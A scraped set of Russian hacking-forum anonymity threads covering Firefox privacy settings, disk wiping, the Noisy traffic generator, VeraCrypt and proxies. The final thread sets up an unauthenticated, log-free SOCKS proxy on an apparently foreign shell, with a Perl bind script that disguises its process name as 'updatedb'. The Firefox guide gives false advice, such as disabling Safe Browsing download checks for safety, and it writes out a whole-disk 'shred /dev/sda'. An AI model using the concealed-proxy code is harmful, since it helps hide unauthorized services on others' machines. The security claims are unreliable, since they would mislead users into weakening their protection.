Это механизм запрета на снятие так называемых «уникальных сетевых отпечатков пальцев браузера пользователя» посредством системных шрифтов, в ближайших планах — блокировка HTML5 Canvas от снятия «отпечатков» По умолчанию функция First-Party Isolation в Firefox отключена. В основном по причине того, что в активном состоянии FPI может конфликтовать с системами аутентификации пользователя на некоторых сайтах.

Code:Copy to clipboard

privacy.firstparty.isolate

Но если вы, как и мы, четенькие пацанчики, сторонники конфиденциальности и противодействия отслеживанию, то следует дважды жамкнуть левой кнопкой мыши по этой опции, чтобы изменить ее значение на true.

Поменял? Отлично поехали дальше :cool:

Code:Copy to clipboard

 privacy.resistFingerprinting

Фингерпринтинг -это техника идентификации пользователей, которая учитывает все открытые параметры: версию браузера, набор плагинов и расширений, разрешение экрана и т.д. С включенным параметром тебе не удасться посмотреть ютубчик. Но ты не за этим настраиваешь свой браузер, верно?

Code:Copy to clipboard

privacy.trackingprotection.fingerprinting.enabled

Посути является предыдущей функцией, но дополнительно будет защищать тебя от фишинговых атак.

Code:Copy to clipboard

browser.send_pings

Блокировка Ping отслеживания:давайте сначала разберемся с аудитом гиперссылок. Это метод отслеживания, при котором код HTML заставляет твой браузер пинговать указанный URL. Этот URL-адрес проверяется при посещении веб-сайта, который вы собираетесь посетить. Этот метод отслеживания отличается от других методов, поскольку он не дает пользователям никакого выбора. Он просто работает в фоновом режиме без ведома пользователя

Ты еще тут? Все доступно? Не волнуйся сделаем мы из тебя крутого хакера!?

Code:Copy to clipboard

browser.urlbar.speculativeConnect.enabled

Это помогает нам контролировать предварительную загрузку URL. Каждый раз, когда мы вводим URL-адрес, на полпути ты должен был заметить автозаполнение URL-адреса. Это известно как предварительная загрузка URL. Это работает так: когда ты начинаешь с ввода URL-адреса, он отправляет запросы домена, чтобы продолжить работу с автозаполнением. Итак, отключив его, предварительная загрузка URL-адресов в адресную строку прекратится. Это помогает предотвратить предложения, которые нам нахер не нужны или которые могут быть сочтены небезопасными.

Code:Copy to clipboard

 dom.event.clipboardevents.enabled

Я сам был в шоке когда узнал, что большой брат знает что у тебя там, ну в смысле в буфере обмена. Короче есть функция которая скрывает от сайтов твой буфер. По этому поменяй значение на false и спи спокойно.

Было зафиксировано множество случаев загрузки медиафайлов. При загрузке этих файлов было доказано, что они зашифрованы, их и их данные было трудно обнаружить. Firefox предоставляет нам возможность убедиться, что ничего подобного не произойдет.

Code:Copy to clipboard

media.eme.enabled

Найди этот параметр и проверь стоит ли там значение "false"

Code:Copy to clipboard

media.navigator.enabled

Если она включена, позволит вашему браузеру извлекать информацию из вашей системы и предоставлять ее посещаемым вами веб-сайтам. Данные, собранные из системы, также могут быть отправлены на Сторонние домены. Дело в том, что если вы разрешите эту опцию, она будет собирать информацию об операционной системе, разрешении экрана, типе системы, FrameRate, FaceMode мобильных устройств, возможном доступе к пользовательским медиа и т. Д. И что еще хуже, они может управлять разрешениями аудио / видео вкладок в браузере, а также получать доступ к камере или микрофону. Следовательно, мы все можем прийти к решению, что сохранение этой опции является серьезной угрозой. А чтобы спасти нас от потенциальных угроз, нам просто нужно отключить

Code:Copy to clipboard

network.cookie.cookieBehavior

При посещении веб-сайта создаются различные файлы cookie. Эти файлы cookie могут быть необходимы, которые используются для функций веб-сайта. И другие - это неважные файлы cookie, такие как сторонние файлы cookie. Эти файлы cookie часто являются результатом рекламы, виджетов и веб-аналитики. Они отслеживают вашу регистрационную информацию, корзины покупок, язык, который вы используете, и т. Д. По умолчанию значение network.cookie.cookiebehaviour установлено на 0. Это значение может быть установлено в диапазоне от 0 до 4, где:

0 = принять все значения cookie
1 = принимать только от собственных доменов
2 = по умолчанию блокировать все файлы cookie
3 = использовать настройки p3p
4 = политика доступа к хранилищу: блокировать файлы cookie от трекеров
Мы выберем здесь значение 1, поскольку нам нужны файлы cookie только из собственных доменов.

Code:Copy to clipboard

browser.sessionstore.privacy_level

Отключи востановление сеанса, часто случается что свет может выключиться в самый подходящий момент.
Если у юзверя есть URL-адреса, открытые в браузере или вошедшие в какое-либо приложение, они восстанавливаются, когда пользователь перезагружает систему. Начиная с выпуска Firefox 2.0 эта опция включена по умолчанию. Некоторые пользователи (идиоты) считают, что это хорошая функция, которая помогает им восстанавливать данные или сеансы, но это представляет угрозу безопасности, поскольку исходный предполагаемый пользователь не перезапускает систему или если это происходит в общедоступной системе, а не человек, который обращается к системе. после перезагрузки получает потенциальный доступ к тем вошедшим в систему сеансам и веб-сайтам, которые просматривал исходный пользователь. Эта опция содержит 3 возможных значения.

0 = хранить дополнительные данные сеанса для любого сайта
1 = хранить данные дополнительного сеанса только для незашифрованных (не HTTPS) сайтов
2 = никогда не хранить дополнительные данные сеанса
Значение по умолчанию для этой опции - 0, т.е. сохранять данные сеанса для любого сайта, и мы изменим его значение на 2, т.е. никогда не сохранять никаких данных.

Code:Copy to clipboard

beacon.enabled

IEEE 802.12.4 говорит, что режим с включенным маяком должен применяться через сеть. Он отправляет информацию о личной сети на серверы, чтобы сообщить им о своем присутствии. Это позволяет время от времени подключаться к новым устройствам. Полезно поддерживать синхронизацию сети. Но это не обязательно, так как он передает подробную информацию о сети, в которой вы находитесь.
Советую поставить значение на "false" иначе есть вероятность что тебя возьмут за жопу.

З@ебалсR? Я очень, потерпи осталось немного.?

Code:Copy to clipboard

browser.safebrowsing.downloads.remote.enabled

По умолчанию в Firefox включены безопасные удаленные загрузки. И мы часто говорили о случаях, когда загружаемый файл кажется подлинным, но вместо этого может быть вредоносной программой. И никогда нельзя быть слишком уверенным. Используя browser.safebrowsing.downloads.remote.enabled, мы можем быть на шаг ближе к тому, чтобы узнать, что мы загружаем безопасные файлы, и ничто не помечается удаленно вместе с файлом.
Поставь значение на "false" что бы быть уверенным что ты загружаешь безопасные файлы

Вывод:
Ну все на этом первая часть закончилась, я думаю теперь ты стал на шаг ближе к анонимности желаю удачи тебе в твоих свершениях, надеюсть я чем-то помог тебе. В ближайшее время я постараюсь написать еще о конфигурациях дополнений которые я использую для пентеста, так что следи за разделом рано или поздно все будет.

Обход рекламы в видео с помощью NoScript

ID: 676533bbb4103b69df371bf7
Thread ID: 31774
Created: 2019-09-15T10:14:34+0000
Last Post: 2021-05-19T11:02:10+0000
Author: AEIOU
Prefix: Статья
Replies: 16 Views: 6K

когда открываеш видео (в моем случаи) появляется это (реклама)

и для того чтобы ее не было (uBlock эту рекламу не уберет) мы дадим блок ссылке при помощи NoScript из за которой реклама появляется

но для начала нужно эту ссылку найти

для этого можно к примеру (в моем случаи) как только появится "это"

сразу же открыть исходный код "этого" элемента нажав правой кнопкой мыши на элемент и выбрать пункт Исс л едовать элемент

нам сразу откроется ссылка на источник

копируем ее

вставляем

убераем лишнее

добавляем

тут без слов понятно

убераем все галочки

перезапускаем сайт (на котором мы убераем рекламу)

или нажимаем на кнопку play и когда запустится реклама делаем все выше описанное
(вас выбросит на ссылку с рекламируемым "продуктом" а не на саму ссылку источника но ее можно найти прокрутив вверх ориентируясь по этой полоске)

с этим "окном" "Исс л едовать" нормально "элемент" не получится

только с этим

(там где написано слово реклама которое выделено красным (а еще кнопка play меньше будет))

(не нужно тыкать ПКМ на надпись РЕКЛАМА или просто на выделеную область красным) (просто на "окно" в общем))
("окно" это "окно")
(без "форточек")
(не тупим)

так же можно засеч рекламный исходник в левом нижнем углу браузера при загрузке сайта (ну вы поняли)

там уже в строке поиска ищем замеченый нами сайт

[Paranoid] Курс по анонимности и безопасности [2018]

ID: 676533bbb4103b69df371c21
Thread ID: 27688
Created: 2019-02-05T18:51:10+0000
Last Post: 2021-03-13T11:36:13+0000
Author: Eject
Prefix: Видео
Replies: 7 Views: 6K

Ради пользователя Fierce Fox, даже потёр url на картиночке.

Hidden content for authorized users.

https://mega.nz/#!juw1EaCa!hzQQJUfYmSGmdlWmdx6WQKQo2lY7A0CBD8bha-rhX6Q

Очистка диска и удаления файлов без возможности их восстановления

ID: 676533bbb4103b69df371c7d
Thread ID: 36836
Created: 2020-04-28T15:37:46+0000
Last Post: 2020-11-13T16:05:02+0000
Author: tabac
Replies: 30 Views: 6K

Кроме программ для восстановления файлов имеется техника под названием магнитно-силовая микроскопия — Magnetic Force Microscopy (MFM), которая позволяет любому в меру финансируемому оппоненту восстановить последние два или три слоя данных, записанных на диск (имеются в виду магнитные носители).

Поэтому если вы хотите стереть данные, например, перед продажей диска, или просто безвозвратно удалить файлы, чтобы они не могли быть восстановлены, обычных возможностей, которые предоставляет операционная система, может быть недостаточно – могут потребоваться специальные программы, о которых и будет здесь рассказано.

shred
Программа предустановлена в Kali Linux. Является частью пакета coreutils.

Shred случайными числами заполняет место, занятое файлом. И уже, даже восстановив ваш удалённый файл, его будет невозможно прочитать. По умолчанию shred не удаляет файл, для этого используется параметр --remove (-u).
shred -u /path/to/file
В shred заложен 25-тикратный цикл, то есть программа перезапишет файл случайным содержимым 25 раз. Чтобы изменить это значение, например на 35-тикратный:
shred -u -n 35 /path/to/file

Если ваша паранойя достигла ещё большего уровня, то вам подойдут следующие советы:

Чтобы спрятать информацию о том, что вы зачищали файл, используйте параметр -z, добавляющий нули в конец файла — это сделает файл непохожим на зашифрованный. Если вам интересно наблюдать за процессом перезаписи, параметр -v (verbose) служит для подробного вывода информации прогресса.
shred -u -z /path/to/file
Если хотите удалить сразу несколько файлов, то укажите их в таком формате:
shred -u -z -n 30 /path/to/file1 /path/to/file2 /path/to/file3
или же можно использовать маску:
shred -u -z -n *.txt
Shred также может удалить содержимое всего жёсткого диска командой
shred /dev/sda
Естественно, время выполнения операций напрямую зависит от размера файла и скорости записи.
Единственным минусом является то, что shred не умеет удалять каталоги. В этом нам на помощь приходит утилита wipe.

wipe
Wipe- многофункциональная консольная утилита для безвозвратного удаления отдельных файлов и каталогов, а также зачистки разделов, дисков и внешних носителей (флешек).
Домашняя страница- http://lambda-diode.com/software/wipe/

Установка в Kali Linux, Debian, Ubuntu, Linux Mint:
sudo apt-get install wipe

Установка в BlackArch
sudo pacman -S wipe
Для быстрого стирания вы можете использовать её примерно так:
wipe -r -q /путь/для/затирания
Внимание : Wipe надёжно работает только для магнитной памяти, следовательно, для твердотельных дисков (памяти) используйте другие методы.

secure-delete (srm, sfill, sswap)
Пакет secure-delete включает в себя три утилиты(srm, sfill, sswap), которые безопасно очищают файлы, диски, раздел подкачки и память.

srm выполняет безопасную перезапись/переименование/удаление целевого файла(ов).

sfill выполняет безопасную перезапись свободного пространства на разделе, в котором находится указанная директория и всех свободных индексных дескрипторов (inode) указанного каталога.

sswap делает безопасную перезапись раздела подкачки.

Запуск srm со стандартными (безопасными) настройками с более подробным выводом для стирания диска /dev/sdX:
srm -v /dev/sdX

автор и источник @hata_hack

Анонимность в торе

ID: 676533bbb4103b69df371cba
Thread ID: 37292
Created: 2020-05-13T14:30:59+0000
Last Post: 2020-07-22T20:01:13+0000
Author: negg
Replies: 38 Views: 6K

Если четко ответить,насколько анонимен тор всухую? И для полного анонима,или для максимального,что нужно юзать в связке с тором? Просто инфа такая в заплыве тупо,некоторые говорят тор и настроенные мосты хватит,другие говорят впн можно

Как удалить данные с флешки и HDD без возможности восстановления данных?

ID: 676533bbb4103b69df371ced
Thread ID: 32467
Created: 2019-10-13T10:27:13+0000
Last Post: 2020-04-13T12:37:33+0000
Author: IndexMT
Replies: 33 Views: 6K

Здравствуйте!
Подскажите как надёжно удалить данные с флешки и жесткого диска HDD, без возможности восстановления данных?
Вроде есть такой софт hard disk low level format tool но не уверен что это надёжно.

Генерирование случайного трафика для сокрытия персональных данных от интернет-провайдера

ID: 676533bbb4103b69df371d27
Thread ID: 30122
Created: 2019-07-02T10:27:13+0000
Last Post: 2019-09-22T17:05:46+0000
Author: weaver
Replies: 15 Views: 6K

Автор: Hoid

Никакого сетевого нейтралитета не существует, и ваш интернет-провайдер может собирать любую информацию, какую захочет. Частично конфиденциальность можно защитить при помощи VPN, но этот метод не является совершенным. Альтернативный вариант: утилита Noisy, разработанная Итаем Хари, которая позволяет закидать вашего провайдера случайными HTTP/DNS-запросами так, что даже если информация будет перехвачена, то не будет представлять особой ценности.

Если за последний год вы не вылезали из своей берлоги и не знакомы с понятием сетевого нейтралитета, попробую ввести вас быстро в курс дела.

Недавно в США вышел закон, который аннулирует сетевой нейтралитет. То есть теперь провайдер на законных основаниях может собирать информацию о вашей деятельности в интернете без вашего ведома и согласия. На практике сей факт означает, что будут собираться IP-адреса, которые легко могут быть преобразованы в физическое местонахождение, история посещения сайтов и содержимое страниц, просмотренных вне протокола HTTPS, включая информацию, отправленную через веб-формы. В фонде электронных рубежей (Electronic Frontier Foundation; EFF) полагают, что провайдеры могут пойти еще дальше и начать продавать собранные сведения на сторону.

Для защиты от этого произвола нам поможет утилита Noisy, представляющая собой простой скрипт, написанный на Python, который генерирует случайный HTTP/DNS- трафик в фоновом режиме, пока вы просматриваете сайты. Таким образом, ваша информация теряет уникальность становится бесполезной для маркетологов и компаний, занимающихся анализом подобного рода сведений.

Идеи, реализованные в Noisy, не являются чем-то новым, и были подчерпнуты из Squawk, представляющим собой скрипт, внедряемый на веб- страницах для отсылки дополнительных случайных запросов. Однако Noisy проще использовать и модифицировать.

Рассмотрим пошагово, как настроить и запустить этот инструмент.

Шаг 1: Установка зависимостей

У вас должен быть установлен Python. В Kali Linux все необходимое уже есть по умолчанию. Noisy совместим с версиями 2.7 и 3.6. Для проверки версии Python в вашей системе введите следующую команду:

Code:Copy to clipboard

python -V

В Noisy используется модуль [Requests](http://docs.python- requests.org/en/master/), который можно установить при помощи следующей команды:

Code:Copy to clipboard

pip install requests

Кроме того, еще большую пользу от Noisy можно получить, если установить Docker, поскольку в этом случае вы сможете изолировать трафик в ограниченной среде как отдельный канал. Однако использование Docker не является обязательным.

Шаг 2: Клонирование Noisy из GitHub

После того как Python и все нужные зависимости установлены, загружаем Noisy из репозитория при помощи команды git:

Code:Copy to clipboard

git clone https://github.com/1tayH/noisy.git

Альтернативный вариант: зайти в репозиторий и загрузить .zip файл. Вначале нажмите на кнопку «Clone or download» и в открывшемся контекстном меню выберите пункт «Download ZIP». После загрузки распакуйте содержимое архива.

4065

Рисунок 1: Загрузка архива из репозитория

Шаг 3: Знакомство с конфигурационным файлом

Теперь нужно отредактировать конфигурационный файл. Несмотря на то, что для корректной работы Noisy изменять настройки не требуется, попутно мы сможем разобраться, как работает программа. Вначале переходим в директорию с распакованным архивом при помощи команды cd:

Code:Copy to clipboard

cd noisy

Затем откройте файл config.json в вашем любимом текстовом редакторе. В качестве примера используем Vim:

Code:Copy to clipboard

vim config.json

Альтернативный вариант: на рабочем столе зайти папку «Files», а затем в директорию «noisy» и открыть файл config.json в редакторе Notepad++.

Информация в файле хранится в формате JSON. Noisy берет первый адрес из списка «root_urls» и ждет случайное время в диапазоне между «min_sleep» и «max_sleep» (в секундах) перед тем, как кликнуть на случайную ссылку на странице. Глубина просмотра указана в параметре «max_depth». После завершения просмотров страниц на текущем сайте, берется следующий адрес из списка и так далее.

Code:Copy to clipboard

{
    "max_depth": 25,
    "min_sleep": 3,
    "max_sleep": 6,
    "timeout": false,
    "root_urls": [
        "http://4chan.org",
        "https://www.reddit.com",
        "https://www.yahoo.com",
        "http://www.cnn.com",
        "https://p---hub.com",
        "https://www.ebay.com",
        "https://wikipedia.org",
        "https://youtube.com",
        "https://github.com",
        "https://medium.com",
        "https://thep-----bay.org",
    ],
    "blacklisted_urls": [
        "https://t.co",
        "t.umblr.com",
        "messenger.com",
        "itunes.apple.com",
        "l.facebook.com",
        "bit.ly",
        "mediawiki",
        ".css",
        ".ico",
        ".xml",
        "intent/tweet",
        "twitter.com/share",
        "dialog/feed?",
        ".json",
        "zendesk",
        "clickserve",
        ".png"
    ],
    "user agents": [
        "there are many user agents here!"
    ]
}

Как вы могли заметить, есть некоторые особенности, связанные с настройками. Во-первых, в списке «root_urls» всего 11 адресов. Во-вторых, при посещении некоторых сайтов в вышеуказанном списке могут возникнуть проблемы.

При посещении сайтов содержимое не показывается на экране, но может привлечь внимание того, кто занимается мониторингом локальной сети или в случае, если просмотр этих сайтов запрещен настройками прокси-сервера. Короче говоря, отредактируйте этот список на ваше усмотрение. Чем больше будет добавлено адресов, тем более случайным будет трафик.

Поскольку в файле config.json мало адресов, весь список будет пройден за не очень большое время. Как итог, потенциально может появиться опознаваемый кусок информации, который легко будет отфильтрован.

Шаг 4: Добавление сайтов в конфигурационный файл

Чтобы избежать вышеупомянутой проблемы, я создал альтернативный конфигурационный файл. Я решил, что миллиона адресов будет вполне достаточно, загрузил первый миллион сайтов из рейтинга Alexa и прогнал этот список более пяти раз через простейший скрипт- рандомизатор, написанный на Python. Полученный перечень был скопирован в файл config.json. Теперь трафик, генерируемый утилитой Noisy, будет более случайным.

Мой конфигурационный файл размером более 25 Мб можно загрузить, если зайти на GitHub- страницуи либо кликнуть правой кнопкой мыши на кнопку «Download» и в контекстном меню выбрать «Save Link As», либо нажать на кнопку «Download», после чего содержимое файла загрузится в браузере, и вы сможете сохранить страницу. После загрузки не забудьте заменить оригинальный конфигурационный файл в папке «noisy».

Если вы решите сделать свой собственный список сайтов, помните, что информация хранится в формате JSON, и каждый адрес должен быть заключен в двойные кавычки с запятой на конце. Кроме того, я всегда добавляю префикс https://, чтобы вначале попробовать зайти на сайт через протокол HTTPS.

Пример:

Code:Copy to clipboard

"https://website.com",

Шаг 5: Рандомизация трафика

После обновления файла config.json все готово для рандомизации трафика. При помощи команды cd зайдите в директорию noisy и запустите скрипт noisy.py с аргументом в виде конфигурационного файла:

Code:Copy to clipboard

cd noisy
python noisy.py --config config.json

После запуска этой команды начнется генерация случайного трафика. Если все работает корректно, вы должны увидеть исходящий поток различных адресов как в примере ниже:

Code:Copy to clipboard

INFO:root:Visiting https://azerbaijantourism.az/about
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az
INFO:root:Visiting https://azerbaijantourism.az/
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az
INFO:root:Visiting https://azerbaijantourism.az/booking-conditions
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az

Чтобы остановить скрипт, нажмите комбинацию клавиш Ctrl-C.

Шаг 6: Другие параметры в Noisy

Когда Noisy не запущен, используйте аргумент h или help для ознакомления с другими опциями, как, например, установка таймаута.

Code:Copy to clipboard

pythonnoisy.py–help

Полный перечень аргументов:

Code:Copy to clipboard

noisy.py [-h] [--log -l] --config -c [--timeout -t]

опциональные аргументы:
  -h, --help    справка
  --log -l      уровень журналирования событий
  --config -c   конфигурационный файл
  --timeout -t  продолжительность работы паука в секундах

Шаг 7: Запуск Noisy через Docker (необязательно)

Как говорилось выше, можно поместить Noisy в контейнер на базе Docker при помощи следующей команды (но вначале нужно установить Docker):

Code:Copy to clipboard

docker build -t noisy

Вы даже можете сделать сборку для устройства Raspberry Pi с операционной системой Raspbian, если хотите вынести рандомизатор трафика в отдельное место.

Code:Copy to clipboard

docker build -f Dockerfile.pi -t noisy

После того как сборка выполнена, запуск осуществляется при помощи следующей команды:

Code:Copy to clipboard

docker run -it noisy --config config.json

Шаг 8: Увеличение объемов случайного трафика (необязательно)

Изучая конфигурационный файл, вы могли заметить, что задержка устанавливается в секундах. Сей факт означает, что наименьшая задержка может быть равна одной секунде, если настроить конфигурацию так:

Code:Copy to clipboard

"min_sleep": 0,
"max_sleep": 1,

В некоторых случаях этой задержки может быть недостаточно, как, например, в ситуациях, когда в вашей сети много людей, и нужно генерировать большие объемы случайного трафика.

Используя Docker-compose, мы можем запустить одновременно несколько контейнеров для генерации неограниченных объемов трафика. Нужно зайти в папку examples, собрать новый образ и запустить сборку на том количестве контейнеров, которое вам необходимо:

Code:Copy to clipboard

cd examples/docker-compose
docker-compose build
docker-compose up --scale noisy=<number-of-containers>

Однако в этом случае нужно отслеживать количество генерируемого трафика, поскольку при большом количестве работающих контейнеров может замедлиться скорость интернета. Кроме того, если у вас есть ограничения по трафику, нужно очень внимательно следить за тем, сколько генерируется случайных данных.

Как вы могли убедиться, Noisy – чрезвычайно простая утилита, и после некоторых настроек, вы получаете невероятно мощный инструмент, который должен стать вашим повседневным инструментом, если вы заботитесь о своей конфиденциальности.

Спасибо за внимание. Вы всегда можете связаться со мной через твиттер @The_Hoid.

вопрос: что видит провайдер?

ID: 676533bbb4103b69df371d31
Thread ID: 31663
Created: 2019-09-10T12:46:56+0000
Last Post: 2019-09-13T17:37:34+0000
Author: AEIOU
Replies: 20 Views: 6K

допустим за твоей активностью (в сети) "следят" (типо знают тебя знают там что ты обычный трудяга который сидит в инстаграме оставляет в личках соц сетей свое личное инфо (переписки со своей девушкой по душам к примеру) (для такого человека будет не естественно пользоваться технологиями инф без) знают с какой точки доступа ты седиш знают где ты находишся и могут (или нет я не знаю) понять шифруешся (именно ты) или нет)

и чтобы сокрыть (свои) действия (в интернетах) ты просишь (анонимно) "друга" провести весь твой трафик через тор (или типо к примеру ты раздобыл анонимно где-то флэшку с tails)
(услыхал о торе к примеру в новостях и о том как любой может посмотреть как ты дрочеш (типо такая инфа на руках у спец служб (ну вы поняли)))

+ чтобы не спалится (типо какого хрена в сети тор сидишь а ни одного по (програмного обеспечения) на windows у тебя не установлено) устанавливаеш на свои окна (на свой windows) тор под придлогом чека парнухи (типо тор обычные граждане ставят да-бы порно смотреть конфиденциально)

есть ли разница (с точки зрения провайдера (ну вы поняли)) между просто тором (если ты просто в винде браузер тор запустишь поставишь там к примеру максимальную безопасность в стандартных настройках браузера (и начнешь фапдвачить)) и tails и на сколько она существенна (некие аспекты в плане подмены мак адреса (если такое мониторится))

и можно ли из за этой разницы по полному слится? (прознают что ты не в браузере тор сидел а tails использовал)
(P.S. думаю теперь понятнее будет о чем речь)

Шифруемся: как настроить ОС с надежным шифрованием данных

ID: 676533bbb4103b69df371d73
Thread ID: 27655
Created: 2019-02-04T16:15:43+0000
Last Post: 2019-02-05T14:41:40+0000
Author: Hide
Replies: 1 Views: 6K

Для поддержания нашей безопасности в постоянном тонусе нам зачастую не достаточно стандартных средств, предлагаемых операционными системами.
В этой статье мы обсудим как установить и настроить ОС с надежным шифрованием данных. Для этого будет использовано 2 пароля и 4 ключа по 256 бит. В дальнейшем эту схему можно доработать и использовать 3 пароля и 5 ключей по 256 бит. Поехали.
Для того, что бы реализовать задуманное, мы будем использовать ОС Linux (хотя можно и Windows), установленную на ПК без шифрования, VirtualBox для создания гостевой «зашифрованнной» ОС и VeraCrypt для шифрования гостевой ОС.
Для начала, нам необходимо установить обычную ОС. Для этой цели может подойти даже Windows, но для больших возможностей и меньшей слежки я рекомендую использовать Linux. Вы можете выбрать абсолютно любой дистрибутив, но рекомендуется установить Debian или Ubuntu. Для новичков подойдет Ubuntu. Процесс установки крайне прост — гугл в помощь. Плюс, рекомендуется выполнить минимальную установку Ubuntu (для этого есть пункт во время установки).
После того, как установили первую нешифрованную ОС (в принципе ее можно зашифровать, но тогда необходимо будет запоминать сразу 3 пароля шифрования), необходимо установить несколько утилит.

Установка VeraCrypt. VeraCrypt — это программное обеспечение, используемое для шифрования «на лету». Скачать ее можно с сайта https://www.veracrypt.fr/en/Downloads.html
После окончания закачки нужно распаковать архив и выполнить установку по инструкции https://codeby.net/kak-ustanovit-veracrypt-na-linux/
Установка VirtualBox. Этот процесс намного проще, чем установка veracrypt. В Ubuntu/Debian достаточно выполнить команду sudo apt install virtualbox.
Скачиваем дистрибутив ОС, которую хотите сделать «сверхзашифрованной».
Создаем файловый контейнер Veracrypt, в который мы будем устанавливать ОС.
Открываем VeraCrypt, нажимаем «Создать том», выбираем «Создать зашифрованный файловый контейнер», выбираем «Обычный том VeraCrypt», если считаете себя крепкими и устойчивыми к пыткам или «Скрытый том VeraCrypt». Далее создаем том следуя инструкциям. Размер выбирайте исходя из того, какой объем данных вы будете хранить. Устанавливаем длинный пароль. PIM использовать не обязательно, но желательно. Алгоритм шифрования выбирайте тройной. После того как всё готово, смонтируйте контейнер в 1 из слотов VeraCrypt (в будущем всегда монтируйте наш контейнер в один и тот же слот для удобства).
Создаем виртуальную машину. Открываем VirtualBox. Жмем «Создать». Переходим в экспертный режим нажатием кнопки. Вводим название машины (любое), выбираем версию ОС. Объем памяти, я рекомендую выбрать, на рыжей полосе, чуть ближе к красной. Жесткий диск мы создаем новый. Далее следует выбрать тип диска VDI. А в расположении указать наш смонтированный криптоконтейнер. Объем диска должен быть чуть меньше размера криптоконтейнера. После завершения создания ВМ, зайти в настройки виртуальной машины и увеличить объем видеопамяти (пункт дисплей) и выделить несколько ядер процессора (пункт система). На этом все подготовительные этапы выполнены и теперь можно приступить к установке зашифрованной ОС.
Установка зашифрованной ОС. Выбираем нашу ВМ и жмем запустить. При первом запуске ВМ VirtualBox предложит вам выбрать образ ОС для установки. После завершения установки вы получите шифрованную гостевую ОС с 2-мя паролями шифрования.
Ни в кем случае не стоит «для дополнительной безопасности» использовать встроенное шифрование VirtualBox Extension. Иногда (например при обновлениях VB или внезапных отключениях электричества) данные могут быть полностью утеряны.
А для тех, кому и этого мало, всегда можно сделать шифрование с 5-ю ключами и 3-мя паролями. Для этого необходимо использовать cryptsetup для основной ОС.

Как вам прокси?

ID: 676533bbb4103b69df371de0
Thread ID: 11746
Created: 2006-09-16T08:50:30+0000
Last Post: 2006-11-08T18:52:08+0000
Author: hawk2000
Replies: 18 Views: 6K

Я вижу много, кто качает прокси отсюда, но я не слышал ни одного мнения о них...
Тут я хотел бы увидеть ваше имхо нащет скорости и работоспособности проксей...

Аноним-серфинг - Софт

ID: 676533bbb4103b69df371dfe
Thread ID: 4801
Created: 2005-09-10T06:07:40+0000
Last Post: 2006-06-05T15:56:22+0000
Author: Cez
Replies: 10 Views: 6K

Люди!!!! Имею три программы - freecap, permeo-premiumagent-win_4_2_6, и СоксКап. Пробовал их все!!! И не одна у меня нормально не работает! :confused: Самая простая в настройках - ФриКап. Указал адрес, порт и тип прокси (HTTP, SOCK4,5). Результата ноль. Ни одна прога через них ни фига не видит. Эксплорер, мыльные браузеры, аська-менеджеры - все не видят своих серверов и т.д. И что самое интересное в инет я могу нормально залезть или удалив эти проги как в случае с permeo-premiumagent или не через них, как в случае с ФриКапом.

Что это может быть???

Пока писал вспомнил, что слышал будто-бы ХP ServicePack2 особо глючная в этом деле, слишком много чего блокирует, и с лишком печется за мою безопасноть.

как Пользоватся прокси серверами

ID: 676533bbb4103b69df371e15
Thread ID: 4950
Created: 2005-09-26T13:14:27+0000
Last Post: 2005-11-16T07:15:20+0000
Author: zoommm
Replies: 15 Views: 6K

ну не знаю там ля я создал эту тему заранее извеняюсь(если что не так)но думаю это относится имено к хакерству!!
у меня стоит адсл и все данные проходят через прокси провайдера !!
я бы хотел скрыть свой ай-пи(наверное пользуясь прокси )но прокси уже есть !!!
подскажите какой програмой лудше и как скрыть свой ай-пи !!!

надеюсь вы меня поняли!!!
и извеняюсь за лаймерский вопрос??? :mellow:

Ставим Socks своими руками

ID: 676533bbb4103b69df371e17
Thread ID: 606
Created: 2005-04-16T11:43:33+0000
Last Post: 2005-04-24T15:53:58+0000
Author: Wo0F
Replies: 6 Views: 6K

Вы наверно не раз сталкивались с необходимостью сделать своё пребывание в сети анонимным. Вы наверное уже знаете что наиболее простым и дешевым способом анонимизировать себя в сети является работа через прокси сервер/ы. И каждый более-менее заботящийся о своей безопасности юзер работает через прокси. Рассказывать что такое прокси и какие они бывают я не буду.

echo open ftp.newmail.ru 21 >mpg # соеденяемся с FTP-сервом
echo yoursite.nm.ru >>mpg # здесь адрес твоего сайта
echo password >>mpg # пароль к твоему аккаунту
echo bin >>mpg # заходим на сайт (чёта такое, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # сливаем с сайта архивчик с 3proxy
echo bye >>mpg # закрываем соединение
ftp -s:mpg

Click to expand...

Итак скачаллось, теперь разархивируй архив. В папке с разархивированным проксиком скомандуй make –f Makefile.unix и жди пока процесс компиляции модулей завершится. Если ты всё сделаешь правильно (и если нормальный шелл), то появится один бинарник с названием 3proxy. Всё. Ты собрал свой проксик, теперь его нужно отконфигурировать. Создаём в той же папке где и бинарник 3proxy файл 3proxy.cfg .
Создал? Молодец, теперь вбиваем настройки, их немного.
Пиши в файле конфига следующее (всё что после # в конфиг добавлять ненужно, ето мои коментарии %) :

nserver 127.0.0.1 # адрес DNS для автоматического соединения
auth none # отключаем авторизацию =))
**allow *** # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно .

Click to expand...

Если ты всё набрал, нажми ctrl+c , конфиг запишется в ту директория в которой ты его создавал.
Вот впринципе и всё по установке. Чтобы запустить собранный сокс скомандуй ./3proxy 3proxy.cfg .

Рассмотрим пример конфига, в котором мы установим авторизацию на нашем соксе:

nserver 127.0.0.1 # адрес DNS для автоматического
users nick:CL:pass # создаём юзера с ником nick и паролем pass 8)
auth strong # указываем необходимость авторизации !
**allow *** # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно

Click to expand...

В конфиге воявляется новая строчка users nick:CL:pass , этой строкой ты создаёшь юзера (nick и pass конечно нужно поменять на свои %). Юзеров можно создать несколько, делается это одинаково. И незабудь изменить строчку auth none на auth strong !

Необходимо забиндить (тоесть открыть) порт для 3proxy.

Скрипт:

#!/usr/bin/perl
$port = 32767;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
